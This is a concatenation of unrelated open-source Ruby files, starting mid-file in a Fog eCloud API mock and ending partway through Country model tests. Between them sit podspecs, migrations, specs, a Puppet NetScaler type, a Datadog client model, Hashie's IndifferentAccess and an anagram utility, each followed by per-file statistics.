canonicalized_headers, canonicalized_resource + "\n" ].join("\n") Base64.encode64(@hmac.sign(string)).chomp end # section 5.6.3.2 in the ~1000 page pdf spec def canonicalize_headers(headers) tmp = headers.inject({}) do |ret, h| ret[h.first.downcase] = h.last if h.first.match(/^x-tmrk/i) ret end tmp.reject! { |k, _v| k == "x-tmrk-authorization" } tmp = tmp.sort.map { |e| "#{e.first}:#{e.last}" }.join("\n") tmp end # section 5.6.3.3 in the ~1000 page pdf spec def canonicalize_resource(path) uri, query_string = path.split("?") return uri.downcase if query_string.nil? 
query_string_pairs = query_string.split("&").sort.map { |e| e.split("=") } tm_query_string = query_string_pairs.map { |x| "#{x.first.downcase}:#{x.last.downcase}" }.join("\n") "#{uri.downcase}\n#{tm_query_string}" end end class Mock include Shared include Errors class Fog::Compute::Ecloud::ServiceError < Fog::Ecloud::Errors::ServiceError; end def self.data @data ||= Hash.new do |hash, key| hash[key] = begin compute_pool_id = Fog.credentials[:ecloud_compute_pool_id] || Fog::Mock.random_numbers(3).to_i environment_id = Fog.credentials[:ecloud_environment_id] || Fog::Mock.random_numbers(3).to_i public_ip_id = Fog.credentials[:ecloud_public_ip_id] || Fog::Mock.random_numbers(6).to_i internet_service_id = Fog::Mock.random_numbers(6).to_i node_service_id = Fog::Mock.random_numbers(6).to_i environment_name = Fog.credentials[:ecloud_environment_name] || Fog::Mock.random_letters(12) location_id = Fog::Mock.random_numbers(4).to_i network_id = Fog.credentials[:ecloud_network_id] || Fog::Mock.random_numbers(6).to_i network_ip = Fog::Ecloud.ip_address public_ip = Fog.credentials[:ecloud_public_ip_name] || Fog::Ecloud.ip_address ip_address_id = Fog::Ecloud.ip_address ip_address2_id = Fog::Ecloud.ip_address operating_system_id = Fog::Mock.random_numbers(7).to_i operating_system_family_id = Fog::Mock.random_numbers(7).to_i organization_id = Fog::Mock.random_numbers(7).to_i organization_name = Fog::Mock.random_letters(7) template_id = Fog.credentials[:ecloud_template_id] || Fog::Mock.random_numbers(7).to_i ssh_key_id = Fog.credentials[:ecloud_ssh_key_id] || Fog::Mock.random_numbers(4).to_i ssh_key_name = Fog.credentials[:ecloud_ssh_key_name] || "root" environment = { :id => environment_id, :href => "/cloudapi/ecloud/environments/#{environment_id}", :name => environment_name, :type => "application/vnd.tmrk.cloud.environment" } organization = { :href => "/cloudapi/ecloud/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.organization", :name => organization_name, :Links => { :Link => [ Fog::Ecloud.keep(environment, :href, :name, :type), { :href => "/cloudapi/ecloud/admin/organizations/#{organization_id}", :name => organization_name, :type => "application/vnd.tmrk.cloud.admin.organization", :rel => "alternate", }, { :href => "/cloudapi/ecloud/devicetags/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.deviceTag; type=collection", :rel => "down", }, { :href => "/cloudapi/ecloud/alerts/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.alertLog", :rel => "down", }, ], }, :Locations => { :Location => [ { :href => "/cloudapi/ecloud/locations/#{location_id}", :name => organization_name, :Catalog => { :href => "/cloudapi/ecloud/admin/catalog/organizations/#{organization_id}/locations/#{location_id}", :type => "application/vnd.tmrk.cloud.admin.catalogEntry; type=collection" }, :Environments => { :Environment => [environment] } } ] } } environment.merge!( :Links => { :Link => [Fog::Ecloud.keep(organization, :href, :name, :type)] } ) admin_organization = { :id => organization_id, :href => "/cloudapi/ecloud/admin/organizations/#{organization_id}", :type => "application/vnd.tmrk.cloud.admin.organization", :name => organization_name, :Links => { :Link => [ Fog::Ecloud.keep(organization, :href, :type, :name) ], }, :organization_id => organization_id, } compute_pool = { :id => compute_pool_id, :href => "/cloudapi/ecloud/computepools/#{compute_pool_id}", :name => Fog::Mock.random_letters(12), :type => "application/vnd.tmrk.cloud.computePool", :environment_id 
=> environment_id, :Links => { :Link => [ Fog::Ecloud.keep(organization, :href, :name, :type), Fog::Ecloud.keep(environment, :href, :name, :type), ] } } public_ip = { :id => public_ip_id, :href => "/cloudapi/ecloud/publicips/#{public_ip_id}", :name => public_ip, :type => "application/vnd.tmrk.cloud.publicIp", :IpType => "none", :environment_id => environment_id, :Links => { :Link => [ Fog::Ecloud.keep(environment, :href, :name, :type), ], }, :InternetServices => { :InternetService => [ ], }, } internet_service = { :id => internet_service_id, :href => "/cloudapi/ecloud/internetservices/#{internet_service_id}", :name => Fog::Mock.random_letters(6), :type => "application/vnd.tmrk.cloud.internetService", :public_ip_id => public_ip_id, :Links => { :Link => [ Fog::Ecloud.keep(public_ip, :href, :name, :type), ], }, :NodeServices => { :NodeService => [ ] }, } node_service = { :id => node_service_id, :href => "/cloudapi/ecloud/nodeservices/#{node_service_id}", :name => Fog::Mock.random_letters(6), :type => "application/vnd.tmrk.cloud.nodeService", :internet_service_id => internet_service_id, :Links => { :Link => [ Fog::Ecloud.keep(internet_service, :href, :name, :type) ], }, } internet_service[:NodeServices][:NodeService].push(node_service) public_ip[:InternetServices][:InternetService].push(internet_service) network = { :id => network_id, :href => "/cloudapi/ecloud/networks/#{network_id}", :name => "#{network_ip}/#{Fog::Mock.random_numbers(2)}", :type => "application/vnd.tmrk.cloud.network", :Address => network_ip, :NetworkType => "Dmz", :BroadcastAddress => network_ip, :GatewayAddress => network_ip, :environment_id => environment_id, :Links => { :Link => [ Fog::Ecloud.keep(environment, :href, :name, :type), ] }, :IpAddresses => { :IpAddress => [], }, } ip_address = { :id => ip_address_id, :href => "/cloudapi/ecloud/ipaddresses/networks/#{network_id}/#{ip_address_id}", :name => ip_address_id, :type => "application/vnd.tmrk.cloud.ipAddress", :network_id => network_id, :Links => { :Link => [Fog::Ecloud.keep(network, :href, :name, :type)] }, :Reserved => "false", :Host => nil, :DetectedOn => nil } ip_address2 = ip_address.dup.merge(:id => ip_address2_id, :href => "/cloudapi/ecloud/ipaddresses/networks/#{network_id}/#{ip_address2_id}", :name => ip_address2_id) network[:IpAddresses][:IpAddress].push(ip_address).push(ip_address2) short_name = "solaris10_64guest" operating_system = { :short_name => short_name, :compute_pool_id => compute_pool_id, :href => "/cloudapi/ecloud/operatingsystems/#{short_name}/computepools/#{compute_pool_id}", :name => "Sun Solaris 10 (64-bit)", :type => "application/vnd.tmrk.cloud.operatingSystem", :FamilyName => "Solaris", :Links => { :Link => Fog::Ecloud.keep(compute_pool, :href, :name, :type), }, :ConfigurationOptions => { :Processor => { :Minimum => "1", :Maximum => "8", :StepFactor => "1" }, :Memory => { :MinimumSize => { :Unit => "MB", :Value => "800" }, :MaximumSize => { :Unit => "MB", :Value => "16384" }, :StepFactor => { :Unit => "MB", :Value => "4" } }, :Disk => { :Minimum => "1", :Maximum => "15", :SystemDisk => { :ResourceCapacityRange => { :MinimumSize => { :Unit => "GB", :Value => "1" }, :MaximumSize => { :Unit => "GB", :Value => "512" }, :StepFactor => { :Unit => "GB", :Value => "1" } }, :MonthlyCost => "0" }, :DataDisk => { :ResourceCapacityRange => { :MinimumSize => { :Unit => "GB", :Value => "1" }, :MaximumSize => { :Unit => "GB", :Value => "512" }, :StepFactor => { :Unit => "GB", :Value => "1" } }, :MonthlyCost => "0" } }, :NetworkAdapter => { :Minimum => 
"1", :Maximum => "4", :StepFactor => "1" } } } template = { :id => template_id, :href => "/cloudapi/ecloud/templates/#{template_id}/computepools/#{compute_pool_id}", :type => "application/vnd.tmrk.cloud.template", :name => "Sun Solaris 10 (x64)", :compute_pool_id => compute_pool_id, :OperatingSystem => Fog::Ecloud.keep(operating_system, :href, :name, :type), :Memory => { :MinimumSize => { :Unit => "MB", :Value => "800" }, :MaximumSize => { :Unit => "MB", :Value => "16384" }, :StepFactor => { :Unit => "MB", :Value => "4" } }, :Storage => { :Size => { :Unit => "GB", :Value => "7" } }, :NetworkAdapters => "1", :Links => { :Link => [ Fog::Ecloud.keep(compute_pool, :href, :name, :type), ] } } operating_system_family = { :id => operating_system_family_id, :compute_pool_id => compute_pool_id, :OperatingSystemFamily => { :Name => "Linux", :OperatingSystems => { :OperatingSystem => [Fog::Ecloud.keep(operating_system, :href, :name, :type)], } }, :Links => { :Link => [ Fog::Ecloud.keep(compute_pool, :href, :name, :type), ] } } ssh_key = { :id => ssh_key_id, :href => "/cloudapi/ecloud/admin/sshKeys/#{ssh_key_id}", :name => ssh_key_name, :admin_organization_id => organization_id, :Links => { :Link => [ Fog::Ecloud.keep(admin_organization, :href, :name, :type), Fog::Ecloud.keep(organization, :href, :name, :type), ] }, :Default => "true", :FingerPrint => Fog::Ecloud.mac_address } layout = { :id => environment_id, :href => "/cloudapi/ecloud/layout/environments/#{environment_id}", :type => "application/vnd.tmrk.cloud.deviceLayout", :Links => { :Link => [ Fog::Ecloud.keep(environment, :name, :href, :type), ], }, :Rows => { :Row => [ ], }, :environment_id => environment_id } { :compute_pools => { compute_pool_id => compute_pool }, :environments => { environment_id => environment }, :public_ips => { public_ip_id => public_ip }, :internet_services => { internet_service_id => internet_service }, :node_services => { node_service_id => node_service }, :networks => { network_id => network }, :organizations => { organization_id => organization }, :admin_organizations => { organization_id => admin_organization }, :operating_systems => { operating_system_id => operating_system }, :operating_system_families => { operating_system_family_id => operating_system_family }, :servers => {}, :tasks => {}, :templates => { template_id => template }, :ssh_keys => { ssh_key_id => ssh_key }, :detached_disks => {}, :template_href => (Fog.credentials[:ecloud_template_href] || "/cloudapi/ecloud/templates/#{template_id}/computepools/#{compute_pool_id}"), :rows => {}, :groups => {}, :layouts => { environment_id => layout } } end end end def self.reset @data = nil end def initialize(options = {}) @base_path = "/cloudapi/ecloud" @ecloud_api_key = options[:ecloud] end def data self.class.data[@ecloud_api_key] end def reset_data self.class.data.delete(@ecloud_api_key) end def response(params = {}) body = params[:body] headers = { "Content-Type" => "application/xml" }.merge(params[:headers] || {}) status = params[:status] || 200 response = Excon::Response.new(:body => body, :headers => headers, :status => status) if params.key?(:expects) && ![*params[:expects]].include?(response.status) e = Excon::Errors::NotFound.new("Expected([200]) <=> Actual(404 Not Found)", "404", response) raise ServiceError.slurp(e) else response end end def deep_copy(o) Marshal.load(Marshal.dump(o)) end end end end end
44.285548
190
0.447404
012ad4b5cd1796edd238a535da72b9d8dc96b50e
590
Pod::Spec.new do |s|
  s.name = "DPAppDoctor"
  s.version = "4.0.0"
  s.ios.deployment_target = '8.0'
  s.summary = "A delightful setting interface framework."
  s.homepage = "https://github.com/xiayuqingfeng/DPAppDoctor"
  s.license = { :type => "MIT", :file => "LICENSE" }
  s.author = { "涂鸦" => "[email protected]" }
  s.source = { :git => "https://github.com/xiayuqingfeng/DPAppDoctor.git", :tag => s.version }
  s.source_files = "DPAppDoctor_SDK/**/*.{h,m}"
  s.requires_arc = true
  s.frameworks = 'UIKit', "Foundation"
  s.dependency "FBRetainCycleDetector"
end
36.875
98
0.637288
39e256e182ddcf882896878498cdb20cbfe2643d
153
class AddLocationToProjects < ActiveRecord::Migration[6.0]
  def change
    add_column :projects, :location, :string, null: false, default: ""
  end
end
25.5
70
0.732026
39172e7ab9e53501bbc6bfc1e0035f6765768bcd
2,547
#
# Author:: John Keiser (<[email protected]>)
# Author:: Ho-Sheng Hsiao (<[email protected]>)
# Copyright:: Copyright (c) 2012 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

require 'chef/chef_fs/file_system/file_system_entry'
require 'chef/chef_fs/file_system/not_found_error'

class Chef
  module ChefFS
    module FileSystem
      # ChefRepositoryFileSystemEntry works just like FileSystemEntry,
      # except can inflate Chef objects
      class ChefRepositoryFileSystemEntry < FileSystemEntry
        def initialize(name, parent, file_path = nil, data_handler = nil)
          super(name, parent, file_path)
          @data_handler = data_handler
        end

        def write_pretty_json=(value)
          @write_pretty_json = value
        end

        def write_pretty_json
          @write_pretty_json.nil? ? root.write_pretty_json : @write_pretty_json
        end

        def data_handler
          @data_handler || parent.data_handler
        end

        def chef_object
          begin
            return data_handler.chef_object(Chef::JSONCompat.parse(read))
          rescue
            Chef::Log.error("Could not read #{path_for_printing} into a Chef object: #{$!}")
          end
          nil
        end

        def can_have_child?(name, is_dir)
          !is_dir && name[-5..-1] == '.json'
        end

        def write(file_contents)
          if file_contents && write_pretty_json && name[-5..-1] == '.json'
            file_contents = minimize(file_contents, self)
          end
          super(file_contents)
        end

        def minimize(file_contents, entry)
          object = Chef::JSONCompat.parse(file_contents)
          object = data_handler.normalize(object, entry)
          object = data_handler.minimize(object, entry)
          Chef::JSONCompat.to_json_pretty(object)
        end

        protected

        def make_child_entry(child_name)
          ChefRepositoryFileSystemEntry.new(child_name, self)
        end
      end
    end
  end
end
31.060976
92
0.657244
017b6b629c675f71fde778571c7c3f5f5820f907
2,306
require 'spec_helper'

describe Medie::Xml::Driver do
  context "when looking up the handler" do
    it "should accept pure application/xml" do
      Medie::Xml::Driver.new.can_handle?("application/xml").should be_true
      Medie::Xml::Driver.new.can_handle?("application/atom+xml").should be_true
      Medie::Xml::Driver.new.can_handle?("text/xml").should be_true
    end

    it "should not accept anything else" do
      Medie::Xml::Driver.new.can_handle?("application/xml2").should be_false
    end

    it "should accept profiles and options" do
      Medie::Xml::Driver.new.can_handle?("application/xml;profile=client").should be_true
      Medie::Xml::Driver.new.can_handle?("application/atom+xml;profile=client").should be_true
      Medie::Xml::Driver.new.can_handle?("text/xml;profile=client").should be_true
    end
  end

  context "when unmarshalling" do
    it "should return an empty hash if its empty" do
      result = Medie::Xml::Driver.new.unmarshal(nil)
      result.should be_empty
      result.should be_kind_of(Hash)
      result.should be_kind_of(Methodize)
      result.should be_kind_of(Medie::Linked)
      result.links.should be_kind_of(Medie::Xml::Links)
    end

    it "should return the unmarshalled Xml hash enhanced" do
      result = Medie::Xml::Driver.new.unmarshal("<name>guilherme</name>")
      result.should == {"name" => "guilherme"}
      result.should be_kind_of(Hash)
      result.should be_kind_of(Methodize)
      result.should be_kind_of(Medie::Linked)
      result.links.should be_kind_of(Medie::Xml::Links)
    end
  end

  context "when marshalling" do
    it "should return itself if its a string" do
      result = Medie::Xml::Driver.new.marshal("guilherme", nil)
      result.should == "guilherme"
    end

    it "should return the unmarshalled Xml hash enhanced" do
      lambda { Medie::Xml::Driver.new.marshal({"name" => "guilherme"}, nil) }.
        should raise_error("Trying to marshal a string into xml does not make sense: 'nameguilherme'")
    end

    it "should return the unmarshalled Xml hash enhanced" do
      hash = {"name" => {"first" => "guilherme"}}
      result = Medie::Xml::Driver.new.marshal(hash, nil)
      result.should == hash["name"].to_xml(:root => "name")
    end
  end
end
33.911765
102
0.670859
03fe762b3fd618f52701ca56e0fe3be8bfba2928
1,685
require "spec_helper" describe Intercom::Company do let(:client) { Intercom::Client.new(token: 'token') } describe "when no response raises error" do it "on find" do client.expects(:get).with("/companies", {:company_id => "4"}).returns(nil) _(proc { client.companies.find(:company_id => "4")}).must_raise Intercom::HttpError end it "on find_all" do client.expects(:get).with("/companies", {}).returns(nil) _(proc { client.companies.all.each {|company| }}).must_raise Intercom::HttpError end it "on load" do client.expects(:get).with("/companies", {:company_id => "4"}).returns({"type" =>"user", "id" =>"aaaaaaaaaaaaaaaaaaaaaaaa", "company_id" => "4", "name" => "MyCo"}) company = client.companies.find(:company_id => "4") client.expects(:get).with("/companies/aaaaaaaaaaaaaaaaaaaaaaaa", {}).returns(nil) _(proc { client.companies.load(company)}).must_raise Intercom::HttpError end end it "finds a company" do client.expects(:get).with("/companies/531ee472cce572a6ec000006", {}).returns(test_company) company = client.companies.find(id: "531ee472cce572a6ec000006") _(company.name).must_equal("Blue Sun") end it "returns a collection proxy for listing contacts" do company = Intercom::Company.new("id" => "1") proxy = company.contacts _(proxy.resource_name).must_equal 'contacts' _(proxy.url).must_equal '/companies/1/contacts' _(proxy.resource_class).must_equal Intercom::Contact end it "deletes a company" do company = Intercom::Company.new("id" => "1") client.expects(:delete).with("/companies/1", {}) client.companies.delete(company) end end
37.444444
168
0.67181
f7d3d32a4a9a24eb79994f93d4b802ff0a01c9fe
136
require 'fog/core'

module Fog
  module Glesys
    extend Fog::Provider

    service(:compute, 'glesys/compute', 'Compute')
  end
end
11.333333
50
0.676471
61bc1da1406bbaea7c337aca7dbbea964f1aa77d
491
# Be sure to restart your server when you modify this file.

# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = '1.0'

# Add additional assets to the asset load path
# Rails.application.config.assets.paths << Emoji.images_path

# Precompile additional assets.
# application.js, application.scss.erb, and all non-JS/CSS in app/assets folder are already added.
# Rails.application.config.assets.precompile += %w( search.js )
40.916667
98
0.769857
ac724d302c88ab352e1260404d676d2662c043ec
313
# frozen_string_literal: true

require "test_helper"

class Folio::Console::Index::PositionButtonsCellTest < Folio::Console::CellTest
  test "show" do
    page = create(:folio_page)
    html = cell("folio/console/index/position_buttons", page, as: :pages).(:show)
    assert html.has_css?(".btn-group")
  end
end
26.083333
81
0.71885
1de21ef39f66c543ea2e4d85b2499d1bd468f379
309
require "eu_central_bank" module Initializer def self.configure_money_gem I18n.config.available_locales = :en I18n.locale = :en Money.locale_backend = :i18n Money.rounding_mode= BigDecimal::ROUND_HALF_UP Money.default_bank = EuCentralBank.new end end Initializer.configure_money_gem
22.071429
50
0.773463
1acd335a786d1dc3e7048899906cb5fac6189a58
2,177
class Anagramizer
  def anagram(word1, word2)
    word1_compare = word1.downcase.split('').sort.delete_if{|x| x.match(/[^a-z]/i)}
    word2_compare = word2.downcase.split('').sort.delete_if{|x| x.match(/[^a-z]/i)}
    if (word1_compare.none? {|e| e.match(/[aeiou]/i)}) || (word2_compare.none? {|e| e.match(/[aeiou]/i)})
      "I don't think those are real words D:"
    elsif word1.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)} == word2.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)}
      "Hey, those are the same words!"
    elsif word1_compare == word2_compare
      "Those words are anagrams!"
    else
      antigram = true
      word1_compare.each do |word1_element|
        word2_compare.each do |word2_element|
          if word1_element == word2_element
            antigram = false
          end
        end
      end
      if antigram
        "Those words are antigrams O:"
      else
        shared_letters = []
        word1_compare.each do |word1_element|
          if word2_compare.include? word1_element
            shared_letters.push(word1_element)
          end
        end
        shared_letters = shared_letters.uniq
        letter = "letters"
        if shared_letters.length == 1
          letter = "letter"
        end
        "Those words are not anagrams, but they have #{shared_letters.length} #{letter} in common: #{shared_letters.join(' ')}"
      end
    end
  end

  def palindrome(word1, word2)
    word1_array = word1.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)}
    word2_array = word2.downcase.split('').delete_if{|x| x.match(/[^a-z]/i)}
    word1_results = false
    word2_results = false
    if word1_array == word1_array.reverse
      word1_results = true
    end
    if word2_array == word2_array.reverse
      word2_results = true
    end
    if word1_results && word2_results
      "Both words/phrases are palindromes!"
    elsif word1_results && !word2_results
      "The first word/phrase is a palindrome but the second is not."
    elsif word2_results && !word1_results
      "The second word/phrase is a palindrome but the first is not."
    else
      "Neither word/phrase is a palindrome :("
    end
  end
end
36.283333
130
0.628388
bf47cd00cc50b1661c929de20a3720d6cff3c96b
34
module Less
  class Bool; end
end
8.5
17
0.735294
1d0d72429d3890703b78cfb14992a3f6a33069d8
4,455
module Hashie
  module Extensions
    # IndifferentAccess gives you the ability to not care
    # whether your hash has string or symbol keys. Made famous
    # in Rails for accessing query and POST parameters, this
    # is a handy tool for making sure your hash has maximum
    # utility.
    #
    # One unique feature of this mixin is that it will recursively
    # inject itself into sub-hash instances without modifying
    # the actual class of the sub-hash.
    #
    # @example
    #   class MyHash < Hash
    #     include Hashie::Extensions::MergeInitializer
    #     include Hashie::Extensions::IndifferentAccess
    #   end
    #
    #   h = MyHash.new(:foo => 'bar', 'baz' => 'blip')
    #   h['foo'] # => 'bar'
    #   h[:foo]  # => 'bar'
    #   h[:baz]  # => 'blip'
    #   h['baz'] # => 'blip'
    #
    module IndifferentAccess
      def self.included(base)
        Hashie::Extensions::Dash::IndifferentAccess::ClassMethods.tap do |extension|
          base.extend(extension) if base <= Hashie::Dash && !base.singleton_class.included_modules.include?(extension)
        end

        base.class_eval do
          alias_method :regular_writer, :[]= unless method_defined?(:regular_writer)
          alias_method :[]=, :indifferent_writer
          alias_method :store, :indifferent_writer
          %w(default update replace fetch delete key? values_at).each do |m|
            alias_method "regular_#{m}", m unless method_defined?("regular_#{m}")
            alias_method m, "indifferent_#{m}"
          end

          %w(include? member? has_key?).each do |key_alias|
            alias_method key_alias, :indifferent_key?
          end

          class << self
            def [](*)
              super.convert!
            end

            def try_convert(*)
              (hash = super) && self[hash]
            end
          end
        end
      end

      # This will inject indifferent access into an instance of
      # a hash without modifying the actual class. This is what
      # allows IndifferentAccess to spread to sub-hashes.
      def self.inject!(hash)
        (class << hash; self; end).send :include, IndifferentAccess
        hash.convert!
      end

      # Injects indifferent access into a duplicate of the hash
      # provided. See #inject!
      def self.inject(hash)
        inject!(hash.dup)
      end

      def convert_key(key)
        key.to_s
      end

      # Iterates through the keys and values, reconverting them to
      # their proper indifferent state. Used when IndifferentAccess
      # is injecting itself into member hashes.
      def convert!
        keys.each do |k|
          regular_writer convert_key(k), convert_value(regular_delete(k))
        end
        self
      end

      def convert_value(value)
        if hash_lacking_indifference?(value)
          IndifferentAccess.inject!(value)
        elsif value.is_a?(::Array)
          value.replace(value.map { |e| convert_value(e) })
        else
          value
        end
      end

      def indifferent_default(key = nil)
        return self[convert_key(key)] if key?(key)
        regular_default(key)
      end

      def indifferent_update(other_hash)
        return regular_update(other_hash) if hash_with_indifference?(other_hash)
        other_hash.each_pair do |k, v|
          self[k] = v
        end
      end

      def indifferent_writer(key, value)
        regular_writer convert_key(key), convert_value(value)
      end

      def indifferent_fetch(key, *args, &block)
        regular_fetch convert_key(key), *args, &block
      end

      def indifferent_delete(key)
        regular_delete convert_key(key)
      end

      def indifferent_key?(key)
        regular_key? convert_key(key)
      end

      def indifferent_values_at(*indices)
        indices.map { |i| self[i] }
      end

      def indifferent_access?
        true
      end

      def indifferent_replace(other_hash)
        (keys - other_hash.keys).each { |key| delete(key) }
        other_hash.each { |key, value| self[key] = value }
        self
      end

      protected

      def hash_lacking_indifference?(other)
        other.is_a?(::Hash) && !(other.respond_to?(:indifferent_access?) && other.indifferent_access?)
      end

      def hash_with_indifference?(other)
        other.is_a?(::Hash) && other.respond_to?(:indifferent_access?) && other.indifferent_access?
      end
    end
  end
end
29.309211
118
0.601796
ffb2a4d2e803cf42b14cf1a8f923f7b0b512c1e9
349
class CreateGroups < ActiveRecord::Migration[5.2]
  def change
    create_table :groups do |t|
      t.string :name
      t.boolean :visible

      t.timestamps
    end
    add_index :groups, :name, unique: true

    create_table :groups_users do |t|
      t.integer :member_id, index: true
      t.integer :group_id, index: true
    end
  end
end
19.388889
49
0.647564
bb5ffd1cc0d98ce3a1ae31bd6367358fab394aa6
1,492
require_relative('../../puppet/property/netscaler_truthy')

Puppet::Type.newtype(:netscaler_responderglobal) do
  @doc = 'Activates the specified responder policy for all requests sent to the NetScaler appliance.'

  apply_to_device
  ensurable

  newparam(:name, :namevar => true) do
    desc "Name of the responder policy."
  end

  newproperty(:priority) do
    desc "Specifies the priority of the policy. Min = 1 Max = 2147483647"
    newvalues(/^\d+$/)
    munge do |value|
      Integer(value)
    end
  end

  newproperty(:goto_expression) do
    desc "Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE."
  end

  newproperty(:invoke_policy_label) do
    desc "Label of policy to invoke if the bound policy evaluates to true."
  end

  newproperty(:invoke_vserver_label) do
    desc "Label of lbvserver to invoke if the bound policy evaluates to true."
  end

  autorequire(:netscaler_responderpolicy) do
    self[:name]
  end

  autorequire(:netscaler_lbvserver) do
    self[:invoke_vserver_label]
  end

  autorequire(:netscaler_csvserver) do
    self[:invoke_vserver_label]
  end

  autorequire(:netscaler_responderpolicylabel) do
    self[:invoke_policy_label]
  end

  validate do
    if [
      self[:invoke_policy_label],
      self[:invoke_vserver_label],
    ].compact.length > 1
      err "Only one of invoke_policy_label, or invoke_vserver_label may be specified per bind."
    end
  end
end
24.459016
135
0.723861
ed3834a76efdb29c9a4b30a7f310ff69a652e521
203
module Disc
  class Topic < DiscObject
    root :post_stream
    list :posts

    def self.find(id)
      response = Disc.request(:get, "/t/#{id}.json")
      self.new(response[:body])
    end
  end
end
16.916667
52
0.610837
1155be2b6673d354140684cfac6de25488cbdbba
433
$:.unshift File.expand_path('..', __FILE__)
$:.unshift File.expand_path('../../lib', __FILE__)

require 'simplecov'
SimpleCov.start do
  add_filter 'vendor'
end

require 'rspec'
require 'rack/test'
require 'webmock/rspec'
require 'omniauth'
require 'omniauth-brapp'

RSpec.configure do |config|
  config.include WebMock::API
  config.include Rack::Test::Methods
  config.extend OmniAuth::Test::StrategyMacros, :type => :strategy
end
22.789474
67
0.741339
d50f0381bbbe6393f860cd8bd065935b25db58b8
3,756
=begin
#Datadog API V1 Collection

#Collection of all Datadog Public endpoints.

The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://github.com/DataDog/datadog-api-client-ruby/tree/master/.generator

Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
This product includes software developed at Datadog (https://www.datadoghq.com/).
Copyright 2020-Present Datadog, Inc.
=end
require 'date'
require 'time'

module DatadogAPIClient::V1
  # Object describing the retry strategy to apply to a Synthetic test.
  class SyntheticsTestOptionsRetry
    include BaseGenericModel

    # Whether the object has unparsed attributes
    # @!visibility private
    attr_accessor :_unparsed

    # Number of times a test needs to be retried before marking a
    # location as failed. Defaults to 0.
    attr_accessor :count

    # Time interval between retries (in milliseconds). Defaults to
    # 300ms.
    attr_accessor :interval

    # Attribute mapping from ruby-style variable name to JSON key.
    # @!visibility private
    def self.attribute_map
      {
        :'count' => :'count',
        :'interval' => :'interval'
      }
    end

    # Returns all the JSON keys this model knows about
    # @!visibility private
    def self.acceptable_attributes
      attribute_map.values
    end

    # Attribute type mapping.
    # @!visibility private
    def self.openapi_types
      {
        :'count' => :'Integer',
        :'interval' => :'Float'
      }
    end

    # List of attributes with nullable: true
    # @!visibility private
    def self.openapi_nullable
      Set.new([
      ])
    end

    # Initializes the object
    # @param attributes [Hash] Model attributes in the form of hash
    # @!visibility private
    def initialize(attributes = {})
      if (!attributes.is_a?(Hash))
        fail ArgumentError, "The input argument (attributes) must be a hash in `DatadogAPIClient::V1::SyntheticsTestOptionsRetry` initialize method"
      end

      # check to see if the attribute exists and convert string to symbol for hash key
      attributes = attributes.each_with_object({}) { |(k, v), h|
        if (!self.class.attribute_map.key?(k.to_sym))
          fail ArgumentError, "`#{k}` is not a valid attribute in `DatadogAPIClient::V1::SyntheticsTestOptionsRetry`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
        end
        h[k.to_sym] = v
      }

      if attributes.key?(:'count')
        self.count = attributes[:'count']
      end

      if attributes.key?(:'interval')
        self.interval = attributes[:'interval']
      end
    end

    # Show invalid properties with the reasons. Usually used together with valid?
    # @return Array for valid properties with the reasons
    # @!visibility private
    def list_invalid_properties
      invalid_properties = Array.new
      invalid_properties
    end

    # Check to see if the all the properties in the model are valid
    # @return true if the model is valid
    # @!visibility private
    def valid?
      true
    end

    # Checks equality by comparing each attribute.
    # @param o [Object] Object to be compared
    # @!visibility private
    def ==(o)
      return true if self.equal?(o)
      self.class == o.class &&
        count == o.count &&
        interval == o.interval
    end

    # @see the `==` method
    # @param o [Object] Object to be compared
    # @!visibility private
    def eql?(o)
      self == o
    end

    # Calculates hash code according to all attributes.
    # @return [Integer] Hash code
    # @!visibility private
    def hash
      [count, interval].hash
    end
  end
end
28.454545
226
0.662673
1d16b826bee225b516e359b7b4da99f50c732298
6,790
require 'test_helper' class CountryTest < ActiveSupport::TestCase test '.bounds returns the bounding box for the Country geometry' do country = FactoryGirl.create(:country, bounding_box: 'POLYGON ((-1 0, 0 1, 1 2, 1 0, -1 0))') assert_equal [[0, -1], [2, 1]], country.bounds end test '.without_geometry does not select the geometry columns' do country = FactoryGirl.create(:country) selected_country = Country.without_geometry.find(country.id) refute selected_country.has_attribute?(:bounding_box) end test '.as_indexed_json returns the Country as JSON' do region = FactoryGirl.create(:region, id: 987, name: 'North Manmerica') country = FactoryGirl.create(:country, id: 123, name: 'Manboneland', region: region) expected_json = { "id" => 123, "name" => 'Manboneland', "iso_3"=> 'MTX', "region_for_index" => { "name" => "North Manmerica" }, "region_name" => "North Manmerica" } assert_equal expected_json, country.as_indexed_json end test '.protected_areas returns the number of Protected Areas in the country' do country = FactoryGirl.create(:country) expected_pas = [ FactoryGirl.create(:protected_area, countries: [country]), FactoryGirl.create(:protected_area, countries: [country]) ] FactoryGirl.create(:protected_area) protected_areas = country.protected_areas assert_equal 2, protected_areas.count assert_same_elements expected_pas.map(&:id), protected_areas.pluck(:id) end test ".designations returns the designations for the Country's Protected Areas" do designation_1 = FactoryGirl.create(:designation, name: 'Lionel Messi') designation_2 = FactoryGirl.create(:designation, name: 'Robin Van Persie') designation_3 = FactoryGirl.create(:designation, name: 'Cristiano Ronaldo') country_1 = FactoryGirl.create(:country) country_2 = FactoryGirl.create(:country) country_3 = FactoryGirl.create(:country) FactoryGirl.create(:protected_area, designation: designation_1, countries: [country_1]) FactoryGirl.create(:protected_area, designation: designation_2, countries: [country_1]) FactoryGirl.create(:protected_area, designation: designation_2, countries: [country_2]) FactoryGirl.create(:protected_area, designation: designation_3, countries: [country_3]) assert_equal 2, country_1.designations.count end test '.protected_areas_with_iucn_categories returns all Protected Areas with valid IUCN categories' do 